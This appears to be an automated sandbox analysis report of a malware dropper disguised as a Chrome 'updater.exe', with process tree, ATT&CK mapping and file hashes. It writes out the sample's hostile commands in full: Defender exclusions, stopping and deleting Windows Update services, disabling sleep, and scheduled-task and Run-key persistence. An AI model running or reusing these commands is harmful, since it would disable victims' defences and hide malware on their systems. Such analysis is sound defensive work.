- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:748

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1544

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1788

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1596

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:2128

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:2580

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:724

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:1856

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:2692

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:1936

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:5008

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:508

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#hyrgjwg#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:104380

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\setup12.exe
"C:\Users\Admin\AppData\Local\Temp\setup12.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5108

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:4576

C:\Users\Admin\AppData\Local\Temp\setup1232.exe
"C:\Users\Admin\AppData\Local\Temp\setup1232.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:104164

C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe
"C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe"
5⤵
- Executes dropped EXE
PID:7892

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C schtasks /create /tn \qnme49ij0f /tr "C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
6⤵
PID:8068

C:\Windows\system32\schtasks.exe
schtasks /create /tn \qnme49ij0f /tr "C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
7⤵
- Creates scheduled task(s)
PID:8120

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2008

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:5272

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5512

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5544

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5608

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5624

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5640

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5656

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:5672

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5688

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:5704

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5724

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5284

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5380

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:5428

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5492

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#bcatrumjd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5300

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe sqolsuydhn
2⤵
PID:8140

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:1848

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:8152

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:8204

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe yaiuavjrxlzbmxlm GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gPpwmfG4wZ3KDbx5PuSQNfaXWXA/ZHUajSlAeIWD5N6
2⤵
PID:8292

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4688

C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe
C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe
1⤵
- Executes dropped EXE
PID:8380

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
d38b0be7a75f44a464fae4850792d85f

SHA1
b2f26d385e01704e04b56bde28b3e2a1892e4e7f

SHA256
33b1ee0ef1ce8e0a1f9e6b4e192eacf6f94b23836898c8ba27b0c057493a9727

SHA512
d7fafa719384524906a42239f5b18a2c2859bdd68eb4fd6ae63ab653c556a88752903f711cf10b5d1f8838858fbd296997e97ebde74735d881ffadd35f09171c

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.1MB

MD5
d38b0be7a75f44a464fae4850792d85f

SHA1
b2f26d385e01704e04b56bde28b3e2a1892e4e7f

SHA256
33b1ee0ef1ce8e0a1f9e6b4e192eacf6f94b23836898c8ba27b0c057493a9727

SHA512
d7fafa719384524906a42239f5b18a2c2859bdd68eb4fd6ae63ab653c556a88752903f711cf10b5d1f8838858fbd296997e97ebde74735d881ffadd35f09171c

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
371a032b2e4ac9562bd76ea9003cb09f

SHA1
f05dbf191e83a7b5311cb1a1e8d3005d5898a04d

SHA256
0c99df79eab17927f5281b5d4dfa96d22f3f8d13e81622f2febb86028aedc8d0

SHA512
a92d59d046182995f26e83179355631011d78bd58bfce23d3f2dc873a680b4146f5a0e284fc97028f01af448971143e5e4412c6efa40b6fdbe2f32a33d94e429

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
fd1db11b61fd774bbbb6b3b502552c3c

SHA1
74d1f2920349aec345ed430b92e5393b33c28cfd

SHA256
f6b6dd0bc1968cd0f8dc0db51fdc67180343bd91eac9747d29f919d41dc71f0b

SHA512
38ef230b24067acff3f3dae60233527b001ee39f8136723fe09abe2db766db44236a53d6a50b94f6db9813516cf5774f7bfb71506fdef0e40d070a2d01196b36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3698a0c2caf0d7ab802abda29d88a393

SHA1
47a6e2777c488a4521d2797c49c40d49971b0fd7

SHA256
e2665f47fd7e33fa1f2205ac31803e39a7d7f71ca8ba0b870b11754ecf2a454d

SHA512
137d0fca6722bcd4909319017d221255460031a22020c27e743aaf744b59b3f11cf73a1c648d90c6958ce3282b6f6a0e77b9961096b958060c4554b7073a7880

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f0b59262205d22e80fa185bb5ed81f4a

SHA1
3c1a227fcce6d17710759eb73c91fa974d4ebadf

SHA256
2ef6af9e2781133c7ce90e5c9b723b6d4dba659ff284c3584d8a77b7ad45fd09

SHA512
5627f4daf4a31a89039f4349af52bb2e3e987c9cd0198eff3ea46e9d7d3a77265721f6256109e8c5e06aab203c729c04352d087610daacc1ef01da5a55525f94

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe
Filesize
19KB

MD5
df9c395f5640a450d5aba408567e7226

SHA1
b6bf596346dfbb906c282224fec47811101e8df4

SHA256
ad4080baa83c70ec3f8c0671b1d75bc85b17def9641be2e02aaf400811410b26

SHA512
bf10f921fa71e6c8557949be4981b9ce8704f3c273d6802035049ea40d1361c29f297f9f8642e9bd5753d3d91ddf0be4b3951cbd3f11571f1f6e64e59ad6a33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChomiumPath.exe
Filesize
19KB

MD5
df9c395f5640a450d5aba408567e7226

SHA1
b6bf596346dfbb906c282224fec47811101e8df4

SHA256
ad4080baa83c70ec3f8c0671b1d75bc85b17def9641be2e02aaf400811410b26

SHA512
bf10f921fa71e6c8557949be4981b9ce8704f3c273d6802035049ea40d1361c29f297f9f8642e9bd5753d3d91ddf0be4b3951cbd3f11571f1f6e64e59ad6a33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
7.1MB

MD5
0810352270005ca86d15c8ba0d2704ab

SHA1
6b5b3d9c32706773b5dfcc2bc6f7a2529480c6fe

SHA256
dc8e45248dbc615f80a6cd7a28fbef0d925bdce86bee35762abe45efa57a7a8d

SHA512
ec1fff1b05ca1e4f61f6b57b1f53eaa875587de3bfa3687d95fd705ca85480f15992d504454a17819dfa5f927cd37f67e8c9225b249ecd587ece18ed0884af80

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
7.1MB

MD5
0810352270005ca86d15c8ba0d2704ab

SHA1
6b5b3d9c32706773b5dfcc2bc6f7a2529480c6fe

SHA256
dc8e45248dbc615f80a6cd7a28fbef0d925bdce86bee35762abe45efa57a7a8d

SHA512
ec1fff1b05ca1e4f61f6b57b1f53eaa875587de3bfa3687d95fd705ca85480f15992d504454a17819dfa5f927cd37f67e8c9225b249ecd587ece18ed0884af80

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup12.exe
Filesize
1.3MB

MD5
0a409a72f0374f2b9628046f2fda83e9

SHA1
21f80c9813bc1b27ab4567b3fe7c495d9da983fd

SHA256
006870ca65bcda51a9b72316cfc03457993c361d837f1c8a16a19a65bfea5070

SHA512
8e7926e59d2b18547eb87869bbbda692e00cb7253eb0c0c5b233a17e0eb6c2f799b68a902e400b902c4ed943e31d6e52ef67f412df924dd956e082c89cb324d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup12.exe
Filesize
1.3MB

MD5
0a409a72f0374f2b9628046f2fda83e9

SHA1
21f80c9813bc1b27ab4567b3fe7c495d9da983fd

SHA256
006870ca65bcda51a9b72316cfc03457993c361d837f1c8a16a19a65bfea5070

SHA512
8e7926e59d2b18547eb87869bbbda692e00cb7253eb0c0c5b233a17e0eb6c2f799b68a902e400b902c4ed943e31d6e52ef67f412df924dd956e082c89cb324d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup1232.exe
Filesize
5.6MB

MD5
2fe9c9de1c3340e79bd827794f6364ff

SHA1
05dabb2212e7bdfe40e6f2d0c84d1ba25943b3b6

SHA256
1db4af8a62ab9e6a9067888db33d5a8096950d3463217e5304d066798a7eb7dc

SHA512
6f29d47fb81450de116a69a631cb06531bcbb3c307132778d83e8b7254063bd04e98e0098b1c6a15207496274158ea2ee61419953ddda626e4785e1be2fd3a49

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup1232.exe
Filesize
5.6MB

MD5
2fe9c9de1c3340e79bd827794f6364ff

SHA1
05dabb2212e7bdfe40e6f2d0c84d1ba25943b3b6

SHA256
1db4af8a62ab9e6a9067888db33d5a8096950d3463217e5304d066798a7eb7dc

SHA512
6f29d47fb81450de116a69a631cb06531bcbb3c307132778d83e8b7254063bd04e98e0098b1c6a15207496274158ea2ee61419953ddda626e4785e1be2fd3a49

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.3MB

MD5
16cc5385354fe53a8a4f10a3c1d6e504

SHA1
0188aa75f084706eff23acac354c8a5d540a8795

SHA256
51aefda1af82fde0809a71728833d653e7d240a17f00ebc3bdd8d87079758c3f

SHA512
bfd279f192a59b23d76ce0d66cf090ad4f7020c2028ffe538607716bca17c36289e99250a0e1dc848b7d6eb28e58c42bd3302d954bb1c2f54f71fb4d0a1475f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.3MB

MD5
16cc5385354fe53a8a4f10a3c1d6e504

SHA1
0188aa75f084706eff23acac354c8a5d540a8795

SHA256
51aefda1af82fde0809a71728833d653e7d240a17f00ebc3bdd8d87079758c3f

SHA512
bfd279f192a59b23d76ce0d66cf090ad4f7020c2028ffe538607716bca17c36289e99250a0e1dc848b7d6eb28e58c42bd3302d954bb1c2f54f71fb4d0a1475f7

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
0a409a72f0374f2b9628046f2fda83e9

SHA1
21f80c9813bc1b27ab4567b3fe7c495d9da983fd

SHA256
006870ca65bcda51a9b72316cfc03457993c361d837f1c8a16a19a65bfea5070

SHA512
8e7926e59d2b18547eb87869bbbda692e00cb7253eb0c0c5b233a17e0eb6c2f799b68a902e400b902c4ed943e31d6e52ef67f412df924dd956e082c89cb324d4

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
0a409a72f0374f2b9628046f2fda83e9

SHA1
21f80c9813bc1b27ab4567b3fe7c495d9da983fd

SHA256
006870ca65bcda51a9b72316cfc03457993c361d837f1c8a16a19a65bfea5070

SHA512
8e7926e59d2b18547eb87869bbbda692e00cb7253eb0c0c5b233a17e0eb6c2f799b68a902e400b902c4ed943e31d6e52ef67f412df924dd956e082c89cb324d4

Download Submit
C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe
Filesize
19KB

MD5
df9c395f5640a450d5aba408567e7226

SHA1
b6bf596346dfbb906c282224fec47811101e8df4

SHA256
ad4080baa83c70ec3f8c0671b1d75bc85b17def9641be2e02aaf400811410b26

SHA512
bf10f921fa71e6c8557949be4981b9ce8704f3c273d6802035049ea40d1361c29f297f9f8642e9bd5753d3d91ddf0be4b3951cbd3f11571f1f6e64e59ad6a33d

Download Submit
C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe
Filesize
19KB

MD5
df9c395f5640a450d5aba408567e7226

SHA1
b6bf596346dfbb906c282224fec47811101e8df4

SHA256
ad4080baa83c70ec3f8c0671b1d75bc85b17def9641be2e02aaf400811410b26

SHA512
bf10f921fa71e6c8557949be4981b9ce8704f3c273d6802035049ea40d1361c29f297f9f8642e9bd5753d3d91ddf0be4b3951cbd3f11571f1f6e64e59ad6a33d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
f00a16a6d663319c1e63892020cbf327

SHA1
d61bf69950a0ae978191e6821aae8f36c25db568

SHA256
886e43b2380f151fb0f67e37775c3f596eff60b058e3218bcb022144533f3f11

SHA512
afb27c910ca18a19993733331219434c1890ec95b78084b89d1fbe1371d15dd39e58fcfcd17824add164dae3f7323bb9392d90971888314f58dca48f0cf9874f

Download Submit
memory/508-295-0x0000000000000000-mapping.dmp

Download
memory/724-307-0x0000000000000000-mapping.dmp

Download
memory/748-270-0x0000000000000000-mapping.dmp

Download
memory/1104-163-0x0000000000000000-mapping.dmp

Download
memory/1104-175-0x0000024724E40000-0x0000024724EB6000-memory.dmp

Filesize
472KB

Download
memory/1104-171-0x000002470BE30000-0x000002470BE52000-memory.dmp

Filesize
136KB

Download
memory/1388-277-0x0000000000000000-mapping.dmp

Download
memory/1544-274-0x0000000000000000-mapping.dmp

Download
memory/1596-284-0x0000000000000000-mapping.dmp

Download
memory/1788-280-0x0000000000000000-mapping.dmp

Download
memory/1848-1288-0x0000000000000000-mapping.dmp

Download
memory/1856-309-0x0000000000000000-mapping.dmp

Download
memory/1936-313-0x0000000000000000-mapping.dmp

Download
memory/2008-576-0x000001D7F9690000-0x000001D7F96AC000-memory.dmp

Filesize
112KB

Download
memory/2008-531-0x0000000000000000-mapping.dmp

Download
memory/2008-617-0x000001D7F96B0000-0x000001D7F96BA000-memory.dmp

Filesize
40KB

Download
memory/2008-584-0x000001D7F9870000-0x000001D7F9929000-memory.dmp

Filesize
740KB

Download
memory/2108-130-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2108-155-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2108-129-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-133-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-415-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2108-153-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-131-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-132-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-128-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-126-0x0000000000000000-mapping.dmp

Download
memory/2108-134-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2108-414-0x00007FF70C310000-0x00007FF70D00A000-memory.dmp

Filesize
13.0MB

Download
memory/2128-286-0x0000000000000000-mapping.dmp

Download
memory/2208-304-0x0000000000000000-mapping.dmp

Download
memory/2224-446-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2224-527-0x00007FF711280000-0x00007FF711F7A000-memory.dmp

Filesize
13.0MB

Download
memory/2224-528-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2224-444-0x00007FF711280000-0x00007FF711F7A000-memory.dmp

Filesize
13.0MB

Download
memory/2224-1296-0x00007FF711280000-0x00007FF711F7A000-memory.dmp

Filesize
13.0MB

Download
memory/2224-1297-0x00007FFD0E570000-0x00007FFD0E74B000-memory.dmp

Filesize
1.9MB

Download
memory/2284-299-0x0000000000000000-mapping.dmp

Download
memory/2580-298-0x0000000000000000-mapping.dmp

Download
memory/2692-312-0x0000000000000000-mapping.dmp

Download
memory/4312-212-0x0000000000DB0000-0x0000000000DE2000-memory.dmp

Filesize
200KB

Download
memory/4312-211-0x0000000000020000-0x00000000005BC000-memory.dmp

Filesize
5.6MB

Download
memory/4312-208-0x0000000000000000-mapping.dmp

Download
memory/4536-440-0x0000000000000000-mapping.dmp

Download
memory/4576-445-0x0000000000000000-mapping.dmp

Download
